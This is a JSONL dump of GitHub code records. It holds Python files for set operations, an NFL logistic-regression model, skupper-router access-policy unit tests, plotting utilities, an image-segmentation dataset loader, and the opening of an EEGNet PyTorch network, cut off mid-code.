S.add(inpt)\r\n\r\n if oper == 'update':\r\n A.update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'intersection_update':\r\n A.intersection_update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'difference_update':\r\n A.difference_update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'symmetric_difference_update':\r\n A.symmetric_difference_update(S)\r\n print('A:')\r\n print(A)\r\n","repo_name":"Raizadaaditya/Atom_Programs","sub_path":"set_update_operations.py","file_name":"set_update_operations.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"28865893039","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\n\n# import numpy as np\n\n\nclass LinearModels:\n def __init__(self, verbose=False):\n self.verbose = verbose\n\n def define_clf(self, clf_type=\"lr\"):\n \"\"\"\n Define a logisitic regression model.\n\n Parameters\n ----------\n clf_type : str, optional\n _description_, by default \"lr\"\n\n Returns\n -------\n _type_\n _description_\n \"\"\"\n if clf_type == \"lr\":\n clf_lr = LogisticRegression()\n return clf_lr\n\n def logistic_regr(self, design_matrix, response):\n \"\"\"\n Fit a logistic regression model to data.\n\n Parameters\n ----------\n design_matrix : DataFrame\n _description_\n response : Vector\n the outcome of interest\n\n Returns\n -------\n Logistic Regression (sklearn)\n _description_\n \"\"\"\n clf_lr = self.define_clf()\n clf_lr.fit(X=design_matrix, y=response)\n return clf_lr\n\n def get_wgts(self, model_object):\n \"\"\"\n Generate bias and weights (coefficients) from a linear model.\n\n Parameters\n ----------\n model_object : Logistic Regression (sklearn)\n _description_\n\n Returns\n -------\n DataFrame\n _description_\n \"\"\"\n # intercept = model_object.intercept_\n bias = model_object.intercept_\n wgts = model_object.coef_\n bias_tbl = pd.DataFrame(bias, columns=[\"bias\"])\n wgts_tbl = pd.DataFrame(wgts, columns=model_object.feature_names_in_)\n\n return pd.concat([bias_tbl, wgts_tbl], axis=1)\n\n def make_random_sample_test(self, data_object, nbr_sample=2):\n tmp_sample = data_object.sample(n=nbr_sample).reset_index(drop=True)\n # tmp_sample_answer = tmp_sample[\"home_team_wins\"]\n return tmp_sample\n\n def make_inference(self, model_object, data_object):\n \"\"\"\n Produce estimates for data.\n\n Parameters\n ----------\n model_object : Logistic Regression (sklearn)\n _description_\n data_object : DataFrame or array-like object\n _description_\n\n Returns\n -------\n Dict\n Contains the following:\n 1. predicted class --> array\n 2. predicted probabilities --> array\n 3. standard deviation of the predicted probabilities --> array\n 4. absolute difference of the predicted probabilities --> array\n\n Notes\n -----\n Calculating and returning the standard deviation and absolute difference of the\n predicted probabilities allows for further underestanding of the models decision\n boundary.\n \"\"\"\n pred_cls = model_object.predict(data_object)\n pred_probs = model_object.predict_proba(data_object)\n\n std_diff = np.std(pred_probs, axis=1)\n abs_diff = np.abs(np.diff(pred_probs, axis=1))\n abs_diff = abs_diff.reshape(std_diff.shape)\n\n infer_dt = {\n \"pred_cls\": pred_cls,\n \"pred_probs\": pred_probs,\n \"std_diff\": std_diff,\n \"abs_diff\": abs_diff,\n }\n\n return infer_dt\n","repo_name":"jonathanharmitage/nflMatchupPredictor","sub_path":"nflMatchupPredictor/Models/LinearModels.py","file_name":"LinearModels.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"19898455238","text":"import json\nfrom typing import TYPE_CHECKING, Any\n\nfrom skupper_router_internal.policy.policy_util import HostAddr, is_ipv6_enabled\nfrom skupper_router_internal.policy.policy_util import HostStruct\nfrom skupper_router_internal.policy.policy_util import PolicyError\nfrom skupper_router_internal.policy.policy_util import PolicyAppConnectionMgr\nfrom skupper_router_internal.policy.policy_local import PolicyLocal\n\nfrom system_test import unittest\nfrom system_test import TestCase, main_module\n\nif TYPE_CHECKING:\n from skupper_router_internal.policy.policy_local import AppStats\n\n\nclass PolicyHostAddrTest(TestCase):\n\n def expect_deny(self, badhostname, msg):\n denied = False\n try:\n xxx = HostStruct(badhostname)\n except PolicyError:\n denied = True\n self.assertTrue(denied, (\"%s\" % msg))\n\n def check_hostaddr_match(self, tHostAddr, tString, expectOk=True):\n # check that the string is a match for the addr\n # check that the internal struct version matches, too\n ha = HostStruct(tString)\n if expectOk:\n self.assertTrue(tHostAddr.match_str(tString))\n self.assertTrue(tHostAddr.match_bin(ha))\n else:\n self.assertFalse(tHostAddr.match_str(tString))\n self.assertFalse(tHostAddr.match_bin(ha))\n\n def test_policy_hostaddr_ipv4(self):\n # Create simple host and range\n aaa = HostAddr(\"192.168.1.1\")\n bbb = HostAddr(\"1.1.1.1,1.1.1.255\")\n # Verify host and range\n self.check_hostaddr_match(aaa, \"192.168.1.1\")\n self.check_hostaddr_match(aaa, \"1.1.1.1\", False)\n self.check_hostaddr_match(aaa, \"192.168.1.2\", False)\n self.check_hostaddr_match(bbb, \"1.1.1.1\")\n self.check_hostaddr_match(bbb, \"1.1.1.254\")\n self.check_hostaddr_match(bbb, \"1.1.1.0\", False)\n self.check_hostaddr_match(bbb, \"1.1.2.0\", False)\n\n def test_policy_hostaddr_ipv6(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n # Create simple host and range\n aaa = HostAddr(\"::1\")\n bbb = HostAddr(\"::1,::ffff\")\n ccc = HostAddr(\"ffff::0,ffff:ffff::0\")\n # Verify host and range\n self.check_hostaddr_match(aaa, \"::1\")\n self.check_hostaddr_match(aaa, \"::2\", False)\n self.check_hostaddr_match(aaa, \"ffff:ffff::0\", False)\n self.check_hostaddr_match(bbb, \"::1\")\n self.check_hostaddr_match(bbb, \"::fffe\")\n self.check_hostaddr_match(bbb, \"::1:0\", False)\n self.check_hostaddr_match(bbb, \"ffff::0\", False)\n self.check_hostaddr_match(ccc, \"ffff::1\")\n self.check_hostaddr_match(ccc, \"ffff:fffe:ffff:ffff::ffff\")\n self.check_hostaddr_match(ccc, \"ffff:ffff::1\", False)\n self.check_hostaddr_match(ccc, \"ffff:ffff:ffff:ffff::ffff\", False)\n\n def test_policy_hostaddr_ipv4_wildcard(self):\n aaa = HostAddr(\"*\")\n self.check_hostaddr_match(aaa, \"0.0.0.0\")\n self.check_hostaddr_match(aaa, \"127.0.0.1\")\n self.check_hostaddr_match(aaa, \"255.254.253.252\")\n\n def test_policy_hostaddr_ipv6_wildcard(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n aaa = HostAddr(\"*\")\n self.check_hostaddr_match(aaa, \"::0\")\n self.check_hostaddr_match(aaa, \"::1\")\n self.check_hostaddr_match(aaa, \"ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\")\n\n def test_policy_malformed_hostaddr_ipv4(self):\n self.expect_deny(\"0.0.0.0.0\", \"Name or service not known\")\n self.expect_deny(\"1.1.1.1,2.2.2.2,3.3.3.3\", \"arg count\")\n self.expect_deny(\"9.9.9.9,8.8.8.8\", \"a > b\")\n\n def test_policy_malformed_hostaddr_ipv6(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n self.expect_deny(\"1::2::3\", \"Name or service not known\")\n self.expect_deny(\"::1,::2,::3\", \"arg count\")\n self.expect_deny(\"0:ff:0,0:fe:ffff:ffff::0\", \"a > b\")\n\n\nclass QpidDispatch:\n def qd_dispatch_policy_c_counts_alloc(self):\n return 100\n\n def qd_dispatch_policy_c_counts_refresh(self, cstats, entitymap):\n pass\n\n\nclass MockAgent:\n def __init__(self) -> None:\n self.qd = QpidDispatch()\n\n def add_implementation(self, entity: 'AppStats', cfg_obj_name: str) -> None:\n pass\n\n\nclass MockPolicyManager:\n def __init__(self):\n self.agent = MockAgent()\n self.logs = []\n\n def log_debug(self, text):\n print(\"DEBUG: %s\" % text)\n self.logs.append(text)\n\n def log_info(self, text):\n print(\"INFO: %s\" % text)\n self.logs.append(text)\n\n def log_trace(self, text):\n print(\"TRACE: %s\" % text)\n self.logs.append(text)\n\n def log_error(self, text):\n print(\"ERROR: %s\" % text)\n self.logs.append(text)\n\n def log_warning(self, text):\n print(\"WARNING: %s\" % text)\n self.logs.append(text)\n\n def get_agent(self):\n return self.agent\n\n\nclass PolicyFile(TestCase):\n\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n def test_policy1_test_zeke_ok(self):\n p1 = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 1)\n self.assertEqual(p1, 'test')\n upolicy = {}\n self.assertTrue(\n PolicyFile.policy.lookup_settings('photoserver', p1, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['maxMessageSize'] == 444444)\n self.assertTrue(upolicy['maxSessionWindow'] == 444444)\n self.assertTrue(upolicy['maxSessions'] == 4)\n self.assertTrue(upolicy['maxSenders'] == 44)\n self.assertTrue(upolicy['maxReceivers'] == 44)\n self.assertTrue(upolicy['allowAnonymousSender'])\n self.assertTrue(upolicy['allowDynamicSource'])\n self.assertTrue(upolicy['targets'] == 'a,private,')\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n def test_policy1_test_zeke_bad_IP(self):\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '10.18.0.1', 'photoserver', \"connid\", 2) == '')\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '72.135.2.9', 'photoserver', \"connid\", 3) == '')\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '127.0.0.1', 'photoserver', \"connid\", 4) == '')\n\n def test_policy1_test_zeke_bad_app(self):\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n def test_policy1_test_users_same_permissions(self):\n zname = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 6)\n yname = PolicyFile.policy.lookup_user('ynot', '10.48.255.254', 'photoserver', '192.168.100.5:33334', 7)\n self.assertTrue(zname == yname)\n\n def test_policy1_lookup_unknown_application(self):\n upolicy = {}\n self.assertFalse(\n PolicyFile.policy.lookup_settings('unknown', 'doesntmatter', upolicy)\n )\n\n def test_policy1_lookup_unknown_usergroup(self):\n upolicy = {}\n self.assertFalse(\n PolicyFile.policy.lookup_settings('photoserver', 'unknown', upolicy)\n )\n\n\nclass PolicyFileApplicationFallback(TestCase):\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n def test_bad_app_fallback(self):\n # Show that with no fallback the user cannot connect\n self.assertTrue(\n self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n # Enable the fallback defaultVhost and show the same user can now connect\n self.policy.set_default_vhost('photoserver')\n settingsname = self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5)\n self.assertTrue(settingsname == 'test')\n\n # Show that the fallback settings are returned\n upolicy = {}\n self.assertTrue(\n self.policy.lookup_settings('phony*app*name', settingsname, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['maxMessageSize'] == 444444)\n self.assertTrue(upolicy['maxSessionWindow'] == 444444)\n self.assertTrue(upolicy['maxSessions'] == 4)\n self.assertTrue(upolicy['maxSenders'] == 44)\n self.assertTrue(upolicy['maxReceivers'] == 44)\n self.assertTrue(upolicy['allowAnonymousSender'])\n self.assertTrue(upolicy['allowDynamicSource'])\n self.assertTrue(upolicy['targets'] == 'a,private,')\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n # Disable fallback and show failure again\n self.policy.set_default_vhost('')\n self.assertTrue(\n self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n\nclass PolicyAppConnectionMgrTests(TestCase):\n\n def test_policy_app_conn_mgr_fail_by_total(self):\n stats = PolicyAppConnectionMgr(1, 2, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('application connection limit', diags[0])\n\n def test_policy_app_conn_mgr_fail_by_user(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, None))\n\n def test_policy_app_conn_mgr_fail_by_hosts(self):\n stats = PolicyAppConnectionMgr(3, 2, 1)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per host', diags[0])\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, None, 2))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, None, 2))\n\n def test_policy_app_conn_mgr_fail_by_user_hosts(self):\n stats = PolicyAppConnectionMgr(3, 1, 1)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 2)\n success = 'per user' in diags[0] or 'per user' in diags[1]\n self.assertTrue(success)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, 2))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, 2))\n\n def test_policy_app_conn_mgr_update(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n stats.update(3, 2, 2)\n self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n\n def test_policy_app_conn_mgr_disconnect(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n stats.disconnect(\"10.10.10.10:10000\", 'chuck', '10.10.10.10')\n self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n\n def test_policy_app_conn_mgr_create_bad_settings(self):\n denied = False\n try:\n stats = PolicyAppConnectionMgr(-3, 1, 2)\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Failed to detect negative setting value.\")\n\n def test_policy_app_conn_mgr_update_bad_settings(self):\n denied = False\n try:\n stats = PolicyAppConnectionMgr(0, 0, 0)\n except PolicyError:\n denied = True\n self.assertFalse(denied, \"Should allow all zeros.\")\n try:\n stats.update(0, -1, 0)\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Failed to detect negative setting value.\")\n\n def test_policy_app_conn_mgr_larger_counts(self):\n stats = PolicyAppConnectionMgr(10000, 10000, 10000)\n diags = []\n for i in range(0, 10000):\n self.assertTrue(stats.can_connect('1.1.1.1:' + str(i), 'chuck', '1.1.1.1', diags, None, None))\n self.assertTrue(len(diags) == 0)\n self.assertFalse(stats.can_connect('1.1.1.1:10000', 'chuck', '1.1.1.1', diags, None, None))\n self.assertTrue(len(diags) == 3)\n self.assertTrue(stats.connections_active == 10000)\n self.assertTrue(stats.connections_approved == 10000)\n self.assertTrue(stats.connections_denied == 1)\n\n\nclass PolicyAliases(TestCase):\n\n #\n def test_AliasesRenameOwnVhost(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"allowUnknownUser\": true,\n \"aliases\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"remoteHosts\": \"*\",\n \"allowDynamicSource\": true,\n \"allowAnonymousSender\": true,\n \"sources\": \"$management, examples, q1\",\n \"targets\": \"$management, examples, q1\",\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Ruleset duplicates vhost and alias but condition not detected.\")\n\n #\n def test_SameAliasOnTwoVhosts(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"aliases\": \"a,b,c,d,e\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n},\n{\n \"hostname\": \"doshormigas\",\n \"aliases\": \"i,h,g,f,e\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n policy.create_ruleset(ruleset[1])\n except PolicyError as e:\n denied = True\n self.assertTrue(denied, \"Rulesets duplicate same alias in two vhosts but condition not detected.\")\n\n #\n def test_AliasConflictsWithVhost(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n},\n{\n \"hostname\": \"conflict-with-vhost\",\n \"aliases\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n policy.create_ruleset(ruleset[1])\n except PolicyError as e:\n denied = True\n self.assertTrue(denied, \"Ruleset alias names other vhost but condition not detected.\")\n\n #\n def test_AliasOperationalLookup(self):\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n # For this test the test config defines vhost 'photoserver'.\n # This test accesses that vhost using the alias name 'antialias'.\n settingsname = policy.lookup_user('zeke', '192.168.100.5', 'antialias', \"connid\", 5)\n self.assertTrue(settingsname == 'test')\n\n upolicy = {}\n self.assertTrue(\n policy.lookup_settings('antialias', settingsname, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n\nif __name__ == '__main__':\n unittest.main(main_module())\n","repo_name":"skupperproject/skupper-router","sub_path":"tests/router_policy_test.py","file_name":"router_policy_test.py","file_ext":"py","file_size_in_byte":17174,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"}
+{"seq_id":"35866152579","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\nfrom typing import List, Tuple, Any, Counter as CounterT\nfrom collections import Counter\nimport toolz.curried as toolz\n\nfrom src.parsing.songs import parse_tracks\nfrom src.IO.genre_io import all_genres\n\n\ndef plot_years(counter: CounterT[int]) -> None:\n breakdown = {\n \"Year\": list(counter.keys()),\n \"Number of songs\": list(counter.values()),\n }\n\n sns.set_theme()\n axes = sns.barplot(\n data=breakdown,\n x=\"Year\",\n y=\"Number of songs\",\n )\n axes.set_title(\"Songs per year\")\n plt.show()\n\n\n# Show a bar plot of the number of tracks added to the playlist per year\nplot_songs_per_year = toolz.compose(\n plot_years, Counter, list, parse_tracks)\n\n\n@toolz.curry\ndef occurs_more_than(min: int, counter: Counter) -> dict:\n return toolz.valfilter(lambda x: x > min, counter)\n\n\ndef sort_counter(counter: Counter) -> List[Tuple[Any, int]]:\n return sorted(counter.items(), key=lambda pair: pair[1], reverse=True)\n\n\ndef plot_genres(sorted_counter: List[Tuple[str, int]]) -> None:\n breakdown = {\n \"Genre\": list(map(toolz.get(0), sorted_counter)),\n \"Occurences\": list(map(toolz.get(1), sorted_counter)),\n }\n sns.set_theme()\n axes = sns.barplot(\n data=breakdown,\n x=\"Genre\",\n y=\"Occurences\",\n )\n axes.set_title(\"Most common genres\")\n plt.show()\n\n\n# Show a bar plot of the number of songs per genre in the playlist\nplot_songs_per_genre = toolz.compose(\n plot_genres,\n sort_counter,\n occurs_more_than(10),\n Counter,\n list\n)\n","repo_name":"SMC242/spotify-wrapped-playlist","sub_path":"src/formatting/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70411709533","text":"from torch.utils.data import Dataset\nfrom torchvision.transforms.transforms import ToTensor\nimport torch\n\nimport albumentations as A\n\nimport numpy as np\n\nfrom PIL import Image\nimport cv2 as cv\n\nfrom typing import Dict, Optional, Union, List\nimport os\nimport json\n\nimport logging\n\nfrom .aug_tools import *\n\n__all__ = [\n \"cfg2datasets\",\n \"ImgMaskSet\",\n \"datasets2json_file\"\n]\n\n# Here implemented 'fit' that trains model.\n\nlog = logging.getLogger(__name__)\nimg2tensor = ToTensor()\n\n\nclass ImgMaskSet(Dataset):\n \"\"\"\n It's dataset that returns images, their masks and names. As well, it can return not transformed img.\n In img and mask dirs imgs and corresponding masks should be named the same.\n fgr and bgr trfms have not to change mask (it's can not be a flip, for instance)\n \"\"\"\n def __init__(self, log_name: str, img_dir_path: str, mask_dir_path: str, img_list: List[str],\n bgr_trfm, fgr_trfm, trfm, preproc, # add type of augmentation\n device: torch.device,):\n \"\"\"\n :param log_name: name that is used in log\n\n :param img_dir_path: path to directory where images are contained. in this directory all images are .jpeg\n :param mask_dir_path: path to directory where masks (images with deleted background) are contained.\n in this directory all images are .png\n :param img_list: specifies image names in image directory that should be used\n\n :param bgr_trfm: transformation of background, is not used during the test\n :param fgr_trfm: foreground augmentations, is not used during the test\n :param trfm: transformations to augment dataset, is not used during the test\n :param preproc: transformations that used during the test, it is applied after all other transformations\n\n :param device: device of images and masks\n \"\"\"\n\n self.log_name = log_name\n\n self.img_dir_path = img_dir_path\n self.mask_dir_path = mask_dir_path\n self.device = device\n\n self.img_list = [i[:-5] for i in img_list] # deleted extension .jpeg\n self.size = len(self.img_list)\n\n # augmentation\n self.bgr_trfm = bgr_trfm\n self.fgr_trfm = fgr_trfm\n self.trfm = trfm\n self.aug_flag = True # applying of augmentation depends on it\n\n # preprocessing\n self.preproc = preproc\n self.preproc_flag = True # applying of preprocessing depends on it\n\n # needed to return img in it original form, without preproc and augmentation\n self.return_original_img = False\n\n log.info(f\"Created {self.log_name} dataset: \\n\"\n f\"Size: {self.size} \\n\"\n f\"Device: {self.device} \\n\"\n f\"Path to image dir: {self.img_dir_path} \\n\"\n f\"Path to mask dir: {self.mask_dir_path}\")\n\n def __len__(self):\n return self.size\n\n def __getitem__(self, idx: int):\n\n img_name = self.img_list[idx]\n img_path = os.path.join(self.img_dir_path, img_name + \".jpeg\")\n mask_path = os.path.join(self.mask_dir_path, img_name + \".png\")\n\n # read img and mask\n original_img = cv.imread(img_path)\n if original_img is None:\n msg = f\"Wrong reading image {img_path}\"\n log.critical(msg)\n raise Exception(msg)\n\n original_img = cv.cvtColor(original_img, cv.COLOR_BGR2RGB) # convert to RGB format\n img = original_img.copy()\n\n with Image.open(mask_path) as mask_im:\n mask = np.array(mask_im.split()[-1]) # retrieve transparent mask\n\n # apply transformations\n if self.aug_flag:\n img, mask = self.apply_aug(img, mask)\n if self.preproc_flag:\n img, mask = self.apply_preproc(img, mask)\n\n # convert to tensor and transfer to device\n img_tensor = img2tensor(img).to(torch.float32).to(self.device)\n mask_tensor = img2tensor(mask).to(torch.float32).to(self.device)\n\n # return original image if it's needed\n if self.return_original_img:\n original_img = img2tensor(original_img).to(self.device)\n return img_name, img_tensor, mask_tensor, original_img\n else:\n return img_name, img_tensor, mask_tensor\n\n def apply_aug(self, img, mask):\n trfmd_bgr = self.bgr_trfm(image=img, mask=mask)[\"image\"]\n trfmd_fgr = self.fgr_trfm(image=img, mask=mask)[\"image\"]\n mask = mask.reshape([330, 330, 1])\n img = (trfmd_fgr * mask + trfmd_bgr * (1 - mask)).astype(\"uint8\")\n\n augmented = self.trfm(image=img, mask=mask)\n return augmented[\"image\"], augmented[\"mask\"]\n\n def apply_preproc(self, img, mask):\n preprocessed = self.preproc(image=img, mask=mask)\n return preprocessed[\"image\"], preprocessed[\"mask\"]\n\n def get_img_list(self):\n return [f\"{i}.jpeg\" for i in self.img_list]\n\n def img_list2file(self, path: str):\n with open(os.path.join(path, f\"{self.log_name}_dataset.json\"), \"w\") as fp:\n json.dump(\n {\n \"img_dir\": self.img_dir_path,\n \"mask_dir\": self.mask_dir_path,\n \"imgs_list\": self.get_img_list() # names saved with jpeg format\n },\n fp, indent=2)\n\n\ndef cfg2filter(cfg, ds_lists):\n \"\"\"\n Changes lists of datasets according to the filter\n :param cfg: consists of name, and private settings for each filter\n :param ds_lists: (datasets_lists) dictionary where key is the name\n of dataset and value is a list of imgs\n :return: changed ds_lists\n \"\"\"\n if cfg.name == \"pass\":\n pass\n else:\n msg = f\"Wrong filter \\\"{cfg.name}\\\"\"\n log.critical(msg)\n raise Exception(msg)\n\n return ds_lists\n\n\ndef cfg2datasets(cfg):\n \"\"\"\n :param cfg: dataset_cfg from main config\n consist of:\n 1) device - where to contain returned images\n 2) path - path to the file to read to get list of images for each dataset\n and path to the folder where it contains.\n 3) filter - manipulations with datasets to get new\n 4) bgr_trfm, fgr_trfm, trfm, preproc\n\n :return: dictionary: {dataset_name1: dataset1, ...}\n \"\"\"\n with open(cfg.path, \"r\") as f:\n file_dict = json.load(f)\n\n img_path = file_dict[\"img_path\"]\n mask_path = file_dict[\"mask_path\"]\n ds_lists = cfg2filter(cfg.filter, file_dict[\"dataset_lists\"])\n\n # converting configs to transformations\n bgr_trfm = cfg2trfm(cfg.bgr_trfm)\n fgr_trfm = cfg2trfm(cfg.fgr_trfm)\n trfm = cfg2trfm(cfg.trfm)\n preproc = cfg2trfm(cfg.preproc)\n\n # creating\n datasets = {}\n for ds_name in ds_lists:\n if ds_name == \"validation\":\n datasets[ds_name] = ImgMaskSet(\n log_name=ds_name,\n img_dir_path=img_path, mask_dir_path=mask_path,\n img_list=ds_lists[ds_name],\n bgr_trfm=A.Compose([]), fgr_trfm=A.Compose([]), trfm=A.Compose([]), preproc=preproc,\n device=torch.device(cfg.device)\n )\n else:\n datasets[ds_name] = ImgMaskSet(\n log_name=ds_name,\n img_dir_path=img_path, mask_dir_path=mask_path,\n img_list=ds_lists[ds_name],\n bgr_trfm=bgr_trfm, fgr_trfm=fgr_trfm, trfm=trfm, preproc=preproc,\n device=torch.device(cfg.device)\n )\n\n return datasets\n\n\ndef datasets2json_file(datasets: Dict[str, ImgMaskSet], save_path: str):\n key = [i for i in datasets.keys()][0]\n ds_dict = {\n \"img_path\": datasets[key].img_dir_path,\n \"mask_path\": datasets[key].mask_dir_path\n }\n\n for dataset_name, dataset in datasets.items():\n ds_dict[dataset_name] = dataset.get_img_list()\n\n with open(os.path.join(save_path, \"datasets.json\"), \"w\") as fp:\n json.dump(ds_dict, fp, indent=4)\n\n","repo_name":"ChocoL0rd/ImgSegmentation","sub_path":"new_code/tools/dataset_tools.py","file_name":"dataset_tools.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"329146403","text":"'''\n EEGNet pytorch network\n @param\n f1: first conv input channel\n f2: depthwise conv input channel\n fout: sparable conv input channel\n k1: first conv kernel size\n k2: depthwise conv kernel size\n k3: sparable conv kernel size\n do: dropout probability\n'''\n# Torch\nimport torch\nfrom torchvision import datasets, transforms\nimport torch.utils.data as Data\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.nn as nn\n\nclass EEGNet(torch.nn.Module):\n\t# Activation:\n # 0 -> ELU\n # 1 -> ReLU\n # 2 -> LeakyReLU\n def __init__(self, activation=0, f1=16, f2=32, fout=32, k1=51, k2=2, k3=15, do=0.25):\n super(EEGNet, self).__init__()\n if activation == 0:\n \tactivation_f = nn.ELU()\n elif activation == 1:\n \tactivation_f = nn.ReLU()\n else:\n \tactivation_f = nn.LeakyReLU()\n self.firstConv = nn.Sequential(\n nn.Conv2d(1, f1, kernel_size=(1, k1), stride=(1, 1), padding=(0, 25), bias=False),\n nn.BatchNorm2d(f1, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True)\n )\n self.depthwiseConv = nn.Sequential(\n nn.Conv2d(f1, f2, kernel_size=(k2, 1), stride=(1, 1), groups=16, bias=False),\n nn.BatchNorm2d(f2, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True),\n activation_f, \n nn.AvgPool2d(kernel_size=(1,4), stride=(1, 4), padding=0),\n nn.Dropout(p=do)\n )\n self.separableConv = nn.Sequential(\n nn.Conv2d(f2, fout, kernel_size=(1, k3), stride=(1, 1), padding=(0, 7), bias=False),\n nn.BatchNorm2d(fout, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True),\n nn.ELU(),\n nn.AvgPool2d(kernel_size=(1,8), stride=(1, 